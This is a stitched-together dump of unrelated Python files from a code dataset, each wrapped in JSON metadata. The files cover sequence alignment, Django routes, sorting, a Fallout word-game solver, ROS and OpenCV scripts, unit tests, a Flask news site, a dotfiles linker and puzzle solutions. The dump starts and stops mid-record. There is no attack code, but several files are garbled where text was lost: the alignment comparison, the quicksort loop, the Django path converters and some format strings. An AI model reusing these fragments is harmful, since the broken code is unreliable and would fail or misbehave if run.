8/Examples/greeter.py","file_name":"greeter.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"329227644","text":"def readFile(fasta_file):\n\n ''' This function that reads two amino acid sequences into Python strings from a file in FASTA format\n\n This function take as input the file and return as output a tuple (seq1,seq2)\n '''\n\n next(fasta_file) #remove the first header\n lines=fasta_file.readlines() #list containing all the lines\n sequence=''\n sequences=[]\n for line in lines:\n line=line.strip()\n if line.startswith('>'):\n sequences.append(sequence)\n sequence=''\n else:\n sequence+=line\n sequences.append(sequence)\n seq1,seq2=sequences[0],sequences[1]\n return (seq1,seq2)\n\ndef makeDictionary(file,aminoacids):\n\n ''' The function reads a substitution matrix from a file and puts value in a dictionary\n\n Takes in input the file and the amino acids letters. Pairs of aminoa acid letters are\n the keys of the dictionary. The functio return the dictionary\n '''\n\n matrix={} # initialize an empty dictionary\n for aminoacid in aminoacids:\n row=file.readline().split() # splits each line into a list\n for i in range(len(row)):\n couple=aminoacid+aminoacids[i]\n matrix[couple]= float(row[i]) #add in the dictionary also the reverse couple\n matrix[couple[::-1]]=float(row[i]) # as the matrix is symmetric\n return matrix\n\ndef calcAlignment(seq1,seq2,dictionary,gp=0):\n\n '''The function finds the best scoring alignment implementing an ungapped exhaustive alignment algorithm.\n\n The function takes as input the sequences and the scoring matrix; gap penalty is equal to 0. The\n function will return the best alignment(s) and the score.\n '''\n\n if len(seq1) bestAl[2]: bestAl=[''.join(short),''.join(long),score] #if the score is better replace the sequences\n elif score == bestAl[2]: bestAl+=[''.join(short),''.join(long),score] #if the score is equal append the sequences\n return bestAl\n\nfasta_file=open(\"./fasta_file.fasta\",\"r\")\nseq1,seq2=readFile(fasta_file)\n# seq1=\"HAGSGK\"\n# seq2=\"AGKSHAAAA\"\naminoacids=\"ARNDCQEGHILKMFPSTWYV\"\nblosum=open(\"./blosum62.txt\",\"r\")\ndictionary= makeDictionary(blosum,aminoacids)\nbestAl=calcAlignment(seq1,seq2,dictionary)\nprint('\\n'.join(map(str,bestAl))) #map applies str function to each item of bestAl\n","sub_path":"esame 24.04/ungapped_alignment.py","file_name":"ungapped_alignment.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19950298","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'mysite'\nurlpatterns = [\n path('users/', views.index, name='index'),\n path('user//', views.detail, name='detail'),\n path('user/edit//', views.edit, name='edit'),\n path('user/add/', views.add, name='add'),\n path('user/save/', views.save, name='save'),\n path('departments/', views.departments, name='departments'),\n # path('remove-department/', views.removeDepartment, name='removeDepartment'),\n]","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239533655","text":"from typing import List\nimport sys\nimport random\n\n\"\"\"\nQuick sort is mostly used in arrays.\n\nBy using pivot to be the ending element every time, \nit may cause worst case in case of reversed sorted array\nand Time Complexity to be O(n**2)\n\nTo tackle this situation we randomize the given array\nwhich will remove the worst case every time\nand changing worst case to average case\nand Time Complexity to be O(n log n)\n\none downside is it will also make best case to average case.\n\"\"\"\n\ndef randomize(nums: List):\n for _ in range(len(nums)//2):\n j = random.randint(0,len(nums)-1)\n k = random.randint(0,len(nums)-1)\n nums[k],nums[j]=nums[j],nums[k]\n return nums\n\ndef partition(nums: List,s: int,e: int,reverse: bool = False):\n i,j=s,s\n while jnums[e]:\n nums[i],nums[j]=nums[j],nums[i]\n i+=1\n else:\n if nums[j]{1}}\".format(str(word), wordspace))\n print()\n for i,word1 in enumerate(codewords):\n print(\"{0:>{1}}\".format(str(word1), wordspace))\n for j,word2 in enumerate(codewords):\n score = wordmap[i][j][1]\n print(\"{0:>{1}}\".format(score, wordspace))\n print()\n\n\ndef print_words(codewords):\n for word in codewords:\n if word.valid:\n print(repr(word))\n print()\n\n\ndef update_wordmap(j,k,score):\n wordmap[j][k][1] = score\n wordmap[k][j][1] = score\n\n\ndef calculate_score(word1, word2):\n score = 0\n for i in range(len(word1)):\n if word1[i] == word2[i]:\n score += 1\n return score\n\n\ndef is_unsolved(codewords):\n num_remaining = NUM_CODEWORDS\n for word in codewords:\n if not word.valid:\n num_remaining -= 1\n return num_remaining > 1\n\n\ndef main():\n codewords = retrieve_codewords()\n init_wordmap(codewords)\n score_words(codewords)\n print_words(codewords)\n print_wordmap(codewords)\n while is_unsolved(codewords):\n suggested_word = suggest_word(codewords)\n #try_word(codewords, suggested_word)\n try_word(codewords)\n print_words(codewords)\n print_wordmap(codewords)\n update_scores(codewords)\n\n for word in codewords:\n if word.valid:\n print()\n print(\"The codeword is: {word}\".format(word=word))\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"FOHacker.py","file_name":"FOHacker.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"582608916","text":"# Đọc camera và chuyển sang màu xám\r\nimport cv2\r\n\r\n#khai báo đối tượng video\r\ncamera_id = 0\r\nvideo = cv2.VideoCapture(camera_id)\r\n\r\nwhile True:\r\n ret,frame = video.read()\r\n if ret:\r\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n cv2.imshow(\"ảnh\",frame)\r\n\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\nvideo.release()\r\ncv2.destroyAllWindows()","sub_path":"btap1.py","file_name":"btap1.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"187875934","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifierCV, TLClassifier\nimport tf\nimport tf.transformations\nimport cv2\nimport tf_helper\nimport numpy as np\nimport yaml\nimport geometry_msgs.msg\n\n\nSTATE_COUNT_THRESHOLD = 3\n\n\nclass TLDetector(object):\n\n def __init__(self):\n rospy.init_node('tl_detector')\n\n self.car_pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n self.traffic_positions = tf_helper.get_given_traffic_lights()\n\n self.last_traffic_light_state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n self.last_reported_traffic_light_id = None\n self.last_reported_traffic_light_time = None\n\n self.traffic_lights = None\n self.image = None\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n\n self.bridge = CvBridge()\n\n self.experiment_environment = rospy.get_param('/experiment_environment', \"site\")\n self.light_classifier = TLClassifier(self.experiment_environment)\n # self.light_classifier = TLClassifierCV()\n\n self.listener = tf.TransformListener()\n\n rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb, queue_size=1)\n rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb, queue_size=1)\n\n rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb, queue_size=1)\n rospy.Subscriber('/image_color', Image, self.image_cb, queue_size=1)\n\n self.upcoming_stop_light_pub = rospy.Publisher(\n '/upcoming_stop_light_position', geometry_msgs.msg.Point, queue_size=1)\n\n rospy.spin()\n\n def pose_cb(self, msg):\n\n self.car_pose = msg.pose\n\n # For debugging(Ground Truth data)\n # arguments = [self.traffic_lights, self.car_pose, self.waypoints, self.image]\n arguments = [self.traffic_positions, self.car_pose, self.waypoints, self.image]\n are_arguments_available = all([x is not None for x in arguments])\n\n if are_arguments_available:\n\n # Get closest traffic light\n traffic_light = tf_helper.get_closest_traffic_light_ahead_of_car(\n self.traffic_positions.lights, self.car_pose.position, self.waypoints)\n\n # These values seem so be wrong - Udacity keeps on putting in config different values that what camera\n # actually publishes.\n # image_width = self.config[\"camera_info\"][\"image_width\"]\n # image_height = self.config[\"camera_info\"][\"image_height\"]\n\n # Therefore simply check image size\n self.camera_image = self.image\n self.camera_image.encoding = \"rgb8\"\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n traffic_light_state = self.light_classifier.get_classification(cv_image)\n\n # lights_map = {0: \"Red\", 1: \"Yellow\", 2: \"Green\"}\n # rospy.logwarn(\"Detected light: {}\".format(lights_map.get(traffic_light_state, \"Other\")))\n\n if traffic_light_state == TrafficLight.RED or traffic_light == TrafficLight.YELLOW:\n self.upcoming_stop_light_pub.publish(traffic_light.pose.pose.position)\n\n def waypoints_cb(self, lane):\n self.waypoints = lane.waypoints\n\n def traffic_cb(self, msg):\n self.traffic_lights = msg.lights\n\n def image_cb(self, msg):\n self.image = msg\n\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7783312","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2016 the HERA Collaboration\n# Licensed under the 2-clause BSD license.\n\n\"\"\"Testing for `hera_mc.cm_transfer`.\"\"\"\n\nimport argparse\nimport sys\nimport subprocess\nimport os\n\nimport pytest\n\nimport hera_mc\nfrom hera_mc import cm_utils, mc\n\n\ndef test_log():\n from argparse import Namespace\n a = Namespace(test=True, val=0)\n cm_utils.log('testing', args=a)\n\n\ndef test_various():\n a = 'a'\n args = argparse.Namespace(a='def_test', unittesting='')\n x = cm_utils.query_default(a, args)\n assert x == 'def_test'\n args = argparse.Namespace(a='def_test', unittesting='none')\n x = cm_utils.query_default(a, args)\n assert x is None\n args = argparse.Namespace(a='def_test', unittesting='false')\n x = cm_utils.query_default(a, args)\n assert not x\n args = argparse.Namespace(a='def_test', unittesting='true')\n x = cm_utils.query_default(a, args)\n assert x\n args = argparse.Namespace(a='def_test', unittesting='unittest')\n x = cm_utils.query_default(a, args)\n assert x == 'unittest'\n spk = cm_utils.make_part_key(None, None)\n assert spk == cm_utils.system_wide_key\n a, b, c = cm_utils.split_part_key('a:b:c')\n assert c == 'c'\n is_active = cm_utils.is_active(None, None, None)\n assert is_active\n t_tst = cm_utils.get_astropytime('now')\n out = cm_utils.get_stopdate(t_tst)\n assert out == t_tst\n d = cm_utils.get_time_for_display(None)\n assert d == 'None'\n c = cm_utils.put_keys_in_order(['1:A:Z', '2:B:X'], 'RPN')\n assert c[0] == '1:A:Z'\n\n\n@pytest.mark.parametrize((\"input\", \"expected\"),\n [(None, None), ('Test', 'Test'), (['a', 'b'], 'a,b'), (1, '1')])\ndef test_stringify(input, expected):\n x = cm_utils.stringify(input)\n if expected is not None:\n assert x == expected\n else:\n assert x is expected\n\n\n@pytest.mark.parametrize((\"input\", \"expected\"),\n [('Test', ['Test']),\n ('a,b', ['a', 'b']),\n (['Test'], ['Test']),\n (1, [1]),\n ('1-3', [1, 2, 3])])\ndef test_listify(input, expected):\n x = cm_utils.listify(input)\n assert x == expected\n x = cm_utils.listify(None, None_as_list=False)\n assert x is None\n x = cm_utils.listify(None, None_as_list=True)\n assert x[0] is None\n\n\ndef test_match_list():\n x = cm_utils.match_list(['a', 'b'], 'c', None)\n y = list(x)\n assert y[1][1] == 'c'\n x = cm_utils.match_list('a', ['b', 'c'], 'upper')\n y = list(x)\n assert y[1][0] == 'A'\n x = cm_utils.match_list(1, 2, 'lower')\n y = list(x)\n assert y[0][0] == '1'\n with pytest.raises(ValueError) as ml:\n cm_utils.match_list([1, 2, 3], [1, 2, 3, 4, 5])\n assert str(ml.value).startswith('Lists must be same length')\n with pytest.raises(ValueError) as ml:\n cm_utils.match_list([1], [2], 'x')\n assert str(ml.value).startswith('Invalid case_type.')\n\n\ndef test_peel():\n x = cm_utils.peel_key('X9:V', 'RNP')\n assert x[0] == 'V'\n x = cm_utils.peel_key('X9:V', 'PRN')\n assert x[0] == 'X'\n\n\ndef test_to_upper():\n x = cm_utils.to_upper('a')\n assert x == 'A'\n x = cm_utils.to_upper(['a'])\n assert x[0] == 'A'\n x = cm_utils.to_upper(1)\n assert x == '1'\n x = cm_utils.to_upper(None)\n assert x is None\n\n\ndef test_to_lower():\n x = cm_utils.to_lower('a')\n assert x == 'a'\n x = cm_utils.to_lower(['a'])\n assert x[0] == 'a'\n x = cm_utils.to_lower(1)\n assert x == '1'\n x = cm_utils.to_lower(None)\n assert x is None\n\n\ndef test_verbosity():\n sys.argv = ['test', '-v', '0']\n p = argparse.ArgumentParser()\n cm_utils.add_verbosity_args(p)\n args = p.parse_args()\n x = cm_utils.parse_verbosity(args.verbosity)\n assert x == 0\n x = cm_utils.parse_verbosity(None)\n assert x == 1\n x = cm_utils.parse_verbosity('vv')\n assert x == 3\n with pytest.raises(ValueError) as tv:\n cm_utils.parse_verbosity('x')\n assert str(tv.value).startswith(\"Invalid argument to verbosity\")\n\n\ndef test_datetime():\n from astropy.time import Time\n sys.argv = ['test']\n p = argparse.ArgumentParser()\n cm_utils.add_date_time_args(p)\n args = p.parse_args()\n assert args.date == 'now'\n assert args.time == 0.0\n import datetime\n tout = cm_utils.get_astropytime(datetime.datetime.now())\n assert type(tout) == Time\n tout = cm_utils.get_astropytime(2400001.0)\n assert type(tout) == Time\n pytest.raises(ValueError, cm_utils.get_astropytime, 0.0)\n tout = cm_utils.get_astropytime('none')\n assert tout is None\n tout = cm_utils.get_astropytime('2018/1/1', '0.0')\n assert type(tout) == Time\n pytest.raises(ValueError, cm_utils.get_astropytime, '18/1/1')\n tout = cm_utils.get_astropytime('2018/1/1', '12:30:00')\n assert type(tout) == Time\n pytest.raises(ValueError, cm_utils.get_astropytime, '2018/1/1', '0:0:0:0')\n pytest.raises(ValueError, cm_utils.get_astropytime, '2018/1/1', 'x')\n\n\ndef test_put_keys_in_order():\n x = cm_utils.put_keys_in_order(['HH1', 'HH0:A'])\n assert x[0] == 'HH0:A'\n\n\ndef test_get_cm_repo_git_hash():\n cm_hash = cm_utils.get_cm_repo_git_hash(cm_csv_path=mc.test_data_path)\n\n git_hash = subprocess.check_output(['git', '-C', '.', 'rev-parse', 'HEAD'],\n stderr=subprocess.STDOUT).strip()\n\n assert cm_hash, git_hash\n\n example_config_path = os.path.join(os.path.dirname(hera_mc.__path__[0]),\n 'ci', 'example_config.json')\n pytest.raises(ValueError, cm_utils.get_cm_repo_git_hash,\n mc_config_path=example_config_path)\n","sub_path":"hera_mc/tests/test_cm_utils.py","file_name":"test_cm_utils.py","file_ext":"py","file_size_in_byte":5691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"86632727","text":"import unittest\nfrom unittest import mock\nimport os\n\nimport pickle\nfrom itertools import chain\n\nimport json\n\nimport tweepy\nfrom datetime import date\nimport time\n\nfrom orangecontrib.text import twitter\nfrom orangecontrib.text.corpus import Corpus\n\n\ndef get_credentials():\n key = os.environ.get('TWITTER_KEY', '')\n secret = os.environ.get('TWITTER_SECRET', '')\n if key and secret:\n return twitter.Credentials(key, secret)\n return twitter.Credentials('key', 'secret')\n\n\nNO_CREDENTIALS = os.environ.get('TWITTER_KEY', None) is None\nCREDENTIALS_MSG = \"No twitter api credentials have been found.\"\n\n\nclass TestCredentials(unittest.TestCase):\n\n @unittest.skipIf(NO_CREDENTIALS, CREDENTIALS_MSG)\n def test_valid(self):\n credentials = get_credentials()\n self.assertTrue(credentials.valid)\n\n def test_check_bad(self):\n key = twitter.Credentials('bad key', 'wrong secret')\n self.assertFalse(key.valid)\n\n def test_equal(self):\n key1 = twitter.Credentials('key1', 'secret1')\n key2 = twitter.Credentials('key1', 'secret1')\n self.assertEqual(key1, key2)\n\n key2.consumer_secret = 'key2'\n self.assertNotEqual(key1, key2)\n\n self.assertNotEqual(key1, None)\n\n def test_pickle(self):\n key1 = twitter.Credentials('key1', 'secret1')\n pickled = pickle.dumps(key1)\n key2 = pickle.loads(pickled)\n self.assertEqual(key1, key2)\n\n\nclass MyCursor:\n def __init__(self, *args, **kwargs):\n time.sleep(.05)\n self.statuses = tweepy.Status.parse_list(\n None, json.load(open(os.path.join(os.path.dirname(__file__), 'tweets.json'))))\n self.kwargs = kwargs\n self.args = args\n\n def items(self, count):\n return self.statuses[:count]\n\n\n@mock.patch('tweepy.Cursor', MyCursor)\nclass TestTwitterAPI(unittest.TestCase):\n\n def setUp(self):\n self.credentials = get_credentials()\n self.api = twitter.TwitterAPI(self.credentials)\n\n def test_search_callbacks(self):\n self.checker = 0\n\n def on_start():\n self.assertEqual(self.checker, 0)\n self.checker += 1\n\n def on_progress(progress):\n self.assertEqual(self.checker, progress)\n self.checker += 1\n\n def on_finish():\n self.assertEqual(self.checker, 3)\n self.checker += 1\n\n api = twitter.TwitterAPI(self.credentials, on_start=on_start,\n on_progress=on_progress, on_finish=on_finish)\n api.search(word_list=['hello'], max_tweets=2, lang='en')\n api.join()\n self.assertEqual(self.checker, 4)\n\n def test_create_corpus(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n corpus = self.api.create_corpus()\n self.assertIsInstance(corpus, Corpus)\n self.assertEqual(len(corpus), 5)\n\n def test_crate_corpus_attr_selection(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n attributes = ['text', 'created_at', 'author_id']\n corpus = self.api.create_corpus(included_attributes=attributes)\n domain_attributes = [attr.name for attr in chain(corpus.domain.attributes, corpus.domain.metas)]\n self.assertEqual(len(domain_attributes), 3)\n for attr in attributes:\n self.assertIn(attr, domain_attributes)\n\n def test_clear(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n self.assertEqual(len(self.api.container), 5)\n\n self.api.reset()\n self.assertEqual(len(self.api.container), 0)\n\n def test_report(self):\n self.api.search(word_list=['hello'], max_tweets=5)\n self.api.join()\n self.assertEqual(len(self.api.history), 1)\n self.assertIsNotNone(self.api.task.report())\n\n def test_geo_util(self):\n point = twitter.coordinates_geoJSON({})\n self.assertIsNone(point[0])\n self.assertIsNone(point[1])\n\n point = twitter.coordinates_geoJSON({'coordinates': [10, 10]})\n self.assertEqual(point[0], 10)\n self.assertEqual(point[1], 10)\n\n def test_build_query(self):\n # https://dev.twitter.com/rest/public/search\n\n query = self.api.build_query(word_list=['hello', 'world'])\n self.assertIn('hello', query)\n self.assertIn('world', query)\n\n query = self.api.build_query(authors=['johndoe'])\n self.assertIn('from:johndoe', query)\n\n query = self.api.build_query(since=date(2016, 10, 9))\n self.assertIn('since:2016-10-09', query)\n\n query = self.api.build_query(until=date(2016, 10, 9))\n self.assertIn('until:2016-10-09', query)\n\n query = self.api.build_query(word_list=['hello', 'world'], allow_retweets=False)\n self.assertIn(' -filter:retweets', query)\n\n\n@mock.patch('tweepy.Cursor', MyCursor)\nclass TestSearch(unittest.TestCase):\n def setUp(self):\n self.credentials = get_credentials()\n self.api = twitter.TwitterAPI(self.credentials)\n\n def test_running(self):\n self.assertFalse(self.api.running)\n self.api.search(word_list=['hello'], max_tweets=5)\n self.assertTrue(self.api.running)\n self.api.disconnect()\n self.assertFalse(self.api.running)\n\n def test_search_disconnect(self):\n self.api.search(word_list=['hello'], max_tweets=20, lang='en')\n self.api.disconnect()\n self.api.join()\n self.assertLess(len(self.api.container), 10)\n","sub_path":"orangecontrib/text/tests/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616292693","text":"def PatternUnlock(N, hits):\r\n diag = [26, 29, 27, 24, 62, 92, 42, 72, 15, 51, 18, 81, 53, 35, 83, 38]\r\n combination = []\r\n a = 0\r\n summa = 0\r\n SUMMA = []\r\n\r\n for i in range(N - 1):\r\n a = str(hits[i]) + str(hits[i + 1])\r\n combination.append(a)\r\n\r\n for i in range(N - 1):\r\n flag = False\r\n for j in range(len(diag)):\r\n if combination[i] == str(diag[j]):\r\n summa += 2 ** 0.5\r\n flag = True\r\n break\r\n if flag == False:\r\n summa += 1\r\n\r\n summa_itog = int(summa * 100000 + 0.5)\r\n\r\n summa_str = str(summa_itog)\r\n K = len(summa_str)\r\n\r\n summa_list = list(summa_str)\r\n\r\n for i in range(K):\r\n if summa_list[i] != \"0\":\r\n SUMMA.append(summa_list[i])\r\n SUMMA = \"\".join(SUMMA)\r\n return SUMMA\r\n","sub_path":"PatternUnlock.py","file_name":"PatternUnlock.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"212296894","text":"from flask import Blueprint, abort, jsonify\nfrom flask_login import current_user, login_required\n\nfrom ..forms import TagForm\n\napi_tag_blueprint = Blueprint(\"api_tag\", __name__)\n\n\n@api_tag_blueprint.route(\"/new\", methods=[\"POST\"])\n@login_required\ndef new():\n form = TagForm()\n if form.validate_on_submit():\n subscription = current_user.subscriptions.filter_by(\n channel_id=form.channel_id.data\n ).first_or_404()\n response = subscription.add_tag(form.tag_name.data)\n return jsonify(str(response))\n abort(403)\n","sub_path":"tubee/routes/api_tag.py","file_name":"api_tag.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"137262329","text":"from app import app,db,api\nfrom flask import render_template,redirect,url_for,session,flash\nfrom app.forms import LoginForm,RegisterForm,AddNewsForm\nfrom app.models import User,News\nfrom flask_restplus import Resource\nimport uuid\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n\treturn render_template('index.html')\n\n@app.route(\"/news\")\ndef news():\n\tclasses=News.objects().all()\n\treturn render_template('news.html',classes=classes)\n\n@app.route(\"/deletenews/\")\ndef deletenews(idx):\n\tif News.objects().count()>0:\n\t\tNews.objects(news_id=idx).delete()\n\treturn redirect(url_for('news'))\n\n@app.route(\"/addnews\",methods=[\"GET\",\"POST\"])\ndef addnews():\n\tform=AddNewsForm()\n\tif form.validate_on_submit():\n\t\tid=uuid.uuid4()\n\t\tnews_id=str(id.int)\n\t\twhile News.objects(news_id=news_id).first():\n\t\t\tid=uuid.uuid4()\n\t\t\tnews_id=str(id.int)\n\t\theadline=form.headline.data\n\t\tdescription=form.description.data\n\t\tcat_news=form.cat_news.data\n\t\tauthor_name=session.get(\"username\")\n\t\tnews=News(news_id=news_id,description=description,headline=headline,author_name=author_name,cat_news=cat_news)\n\t\tnews.save()\n\t\tflash(f\"News is successfully published!\",\"success\")\n\treturn render_template('addnews.html',form=form)\n\n@app.route(\"/contact\")\ndef contact():\n\treturn render_template('contact.html')\n\n@app.route(\"/logout\",methods=[\"GET\",\"POST\"])\ndef logout():\n\tsession[\"user_id\"]=False\n\tsession.pop(\"username\",None)\n\treturn redirect(url_for(\"login\"))\n\n@app.route(\"/login\",methods=[\"GET\",\"POST\"])\ndef login():\n\tif session.get(\"username\"):\n\t\treturn redirect(url_for('index'))\n\tform=LoginForm()\n\tif form.validate_on_submit():\n\t\temail=form.email.data\n\t\tpassword=form.password.data\n\t\tuser=User.objects(email=email).first()\n\t\tif user and user.get_password(password):\n\t\t\tflash(f\"{user.first_name}, You are successfully logged in!\",\"success\")\n\t\t\tsession[\"user_id\"]=user.user_id\n\t\t\tsession[\"username\"]=user.first_name\n\t\t\tsession[\"email\"]=user.email\n\t\t\treturn redirect(url_for('index'))\n\t\tflash(\"Sorry, something went wrong!\", \"danger\")\n\treturn render_template('login.html',form=form)\n\n@app.route(\"/register\",methods=[\"GET\",\"POST\"])\ndef register():\n\tif session.get('username'):\n\t\treturn redirect(url_for('index'))\n\tform=RegisterForm()\n\tif form.validate_on_submit():\n\t\tuser_id=User.objects.count()\n\t\tuser_id+=1\n\t\temail=form.email.data\n\t\tif User.objects(email=email).first():\n\t\t\tflash(\"Email already exists!\", \"danger\")\n\t\t\treturn redirect(\"/register\")\n\t\tpassword=form.password.data\n\t\tfirst_name=form.first_name.data\n\t\tlast_name=form.last_name.data\n\t\tuser=User(user_id=user_id,email=email,first_name=first_name,last_name=last_name)\n\t\tuser.set_password(password)\n\t\tuser.save()\n\t\tflash(f\"You are successfully registered!\",\"success\")\n\t\treturn redirect(url_for('login'))\n\treturn render_template('register.html',form=form)\t","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"264594616","text":"#!/usr/bin/env python3\n\nSTUFF = [\n ('directory', '.oh-my-zsh'),\n ('tree', '.config'),\n ('files-in', '')\n]\n\n\nimport os, sys, stat, glob\n\nREPO = os.path.abspath(os.path.dirname(__file__))\nHOME = os.getenv('HOME')\n\ndef srcpath(stem):\n return os.path.join(REPO, stem)\ndef dstpath(stem):\n return os.path.join(HOME, stem)\n\nIGNORE_IN_ROOT = ('.git', '.gitmodules', os.path.basename(__file__))\n\n\ndef symlinks():\n\n def each(thing):\n mode, stem = thing\n src = srcpath(stem)\n if mode == 'directory':\n assert os.path.isdir(src)\n yield stem\n elif mode == 'tree':\n assert os.path.isdir(src)\n for path, dirs, files in os.walk(src):\n relpath = os.path.relpath(path, REPO)\n yield from map(\n lambda filename: os.path.join(relpath, filename),\n files\n )\n elif mode == 'files-in':\n entries = os.scandir(src)\n if stem == '':\n entries = filter(\n lambda e: e.name not in IGNORE_IN_ROOT,\n entries)\n yield from map(\n lambda entry: os.path.join(stem, entry.name),\n filter(lambda entry: entry.is_file(), entries)\n )\n else:\n raise ValueError(mode)\n\n for thing in STUFF:\n yield from each(thing)\n\n\ndef on_disk_status(stem):\n srcpath = os.path.join(REPO, stem)\n dstpath = os.path.join(HOME, stem)\n if not os.path.exists(dstpath):\n return 'nonexistent'\n elif (stat.S_ISLNK(os.lstat(dstpath).st_mode)\n and os.readlink(dstpath) == srcpath):\n return 'linked'\n else:\n return 'conflict'\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n action = 'status'\n elif len(sys.argv) == 2:\n action = sys.argv[1]\n else:\n raise ValueError(\"do `script [status]|link|unlink`\")\n\n if action == 'status':\n for stem in symlinks():\n print(\"{}: {}\".format(stem, on_disk_status(stem)))\n elif action == 'link':\n for stem in symlinks():\n s = on_disk_status(stem)\n if s == 'linked':\n pass\n elif s == 'nonexistent':\n print(\"Link\", stem)\n src = srcpath(stem)\n dst = dstpath(stem)\n os.makedirs(os.path.dirname(dst), exist_ok=True)\n os.symlink(src, dst)\n elif s == 'conflict':\n print(\"CONFLICT\", stem)\n else:\n raise ValueError(s, stem)\n elif action == 'unlink':\n for stem in symlinks():\n s = on_disk_status(stem)\n if s == 'linked':\n print(\"Unlink\", stem)\n os.unlink(dstpath(stem))\n elif s != 'nonexistent':\n print(stem, \"remains in state\", s)\n","sub_path":"scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"209923623","text":"# Solution with string slicing:\ndef strStr(self, haystack, needle):\n if needle == \"\":\n return 0\n if len(needle) > len(haystack):\n return -1\n for i in range(len(haystack)):\n if haystack[i: i+len(needle)] == needle:\n return i \n return -1\n\n# Solution with no string slicing:\ndef strStr(self, haystack, needle):\n if needle == \"\":\n return 0\n if len(needle) > len(haystack):\n return -1\n for i in range(len(haystack)):\n if haystack[i] == needle[0]:\n j = i + 1\n k = 1\n while j < len(haystack) and k < len(needle):\n if haystack[j] == needle[k] and k == len(needle) - 1: \n return (i)\n if haystack[j] != needle[k]:\n break\n else:\n j += 1\n k += 1 \n if k == len(needle):\n return i \n return -1\n \n \n ","sub_path":"leetcode/implement_strStr.py","file_name":"implement_strStr.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314239719","text":"from collections import defaultdict\n\nT = int(input())\n\n\nfor test in range(1,T + 1): \n \n N, S = list(map(int, input().split()))\n\n trinkets = list(map(int, input().split()))\n\n r, l = 0,0\n\n score = 0\n\n trinkhash = defaultdict(int)\n\n while r <= N:\n\n while len(trinkhash) <= S:\n score = max(score, r - l)\n trinkhash[r] += 1\n r += 1\n if r > N:\n break\n\n while len(trinkhash) > S:\n trinkhash[l] -= 1\n if trinkhash[l] == 0:\n del trinkhash[l]\n l += 1\n \n print(\"Case #{}: {}\".format(test,score))","sub_path":"Round B/DiverseDiffProb.py","file_name":"DiverseDiffProb.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"373194641","text":"#encoding='utf-8'\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom time import sleep\nimport http.client\n\n# 网页的请求头\nheader = {\n'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n}\nhttp.client._MAXHEADERS = 20000\n#文件下载路径\ndownload_location = '/Users/mfhj-dz-001-068/pythonData/pdfData'\nprefs = {'download.default_directory': download_location}\noption = 